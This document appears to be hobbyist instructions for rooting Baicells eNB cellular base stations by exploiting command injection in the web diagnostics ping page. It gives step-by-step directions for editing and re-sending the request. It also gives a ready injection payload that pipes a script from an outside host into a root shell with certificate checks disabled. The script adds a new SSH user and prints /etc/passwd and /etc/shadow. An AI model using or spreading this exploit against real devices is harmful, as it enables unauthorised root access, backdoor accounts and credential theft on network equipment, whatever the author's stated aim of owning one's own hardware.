Instructions

This is known to work on, at least, Nova227s with 3.7.11.3.
It does not currently work on BaiBS_RTS_3.6.6. This will be remedied ASAP.

This and many similar types of weaknesses are common and expected across all baicells products.

The diagnostics web page has command injection with root privs. The only prevention they
applied was on the client side with javascript. This is great for us,
as it lets us own our hardware more fully.

Log in to web interface.
Go to diagnostics page for ping
Open network tools
Run a ping command (set number to 1 and timeout to 1 if you like, or ping a responsive host like 127.0.0.1)
In the network tools, pick the first request for `run_commands.sh`
Right-click, edit and re-send.
Find the section in the payload where it says `%2Ftmp%2Fdiagnose%0A&hash`
%0A is a newline. Between the '%0A' and the '&' paste anything you
want. It does not need to be urlencoded. It will be executed as root by
the eNB so be very careful. It has busybox and is very simple, so you
don't get a full netcat or bash, for example. I don't know how it handles
quoting, so I decided to have it curl down a script which could then do whatever I needed.
`python -m http.server` makes this very easy.

For your more immediate convenience, you may paste the following (triple click to select the whole string):

curl -k https://baicellsroot.xcl.is/mike.sh | sh%0A

This requires your eNB to have unfettered internet access and working dns.

This will make a new user 'mike' with the same password as your admin
account and allow you to login via ssh on port 27149 like so:

ssh mike@baicellenb -p 27149

Obviously replace 'baicellenb' with your hostname or ip of your actual eNB.
You can then `sudo -s` for root or whatever your preferred invocation.

You need the `-k` argument to curl to disable ssl verification because ca-certificates are not set up on the baicells firmware.
I could also offer http service, but it would take me entire minutes to enable that on my servers.

You should see the output.  It will run `id` and then cat /etc/passwd and /etc/shadow.
The script mike.sh will exit before making changes if there is already a mike user.

Disclaimer: Tested on two of my eNBs. You are expected to know what you are doing.
Test before executing, don't blame me if it breaks. If it does break, let me know and I'll try to help.
If you don't know who I am already, how did you get here? See the links below.

https://xcl.is
https://discord.gg/c55z8aGShr
https://github.com/AmateurCellular/docs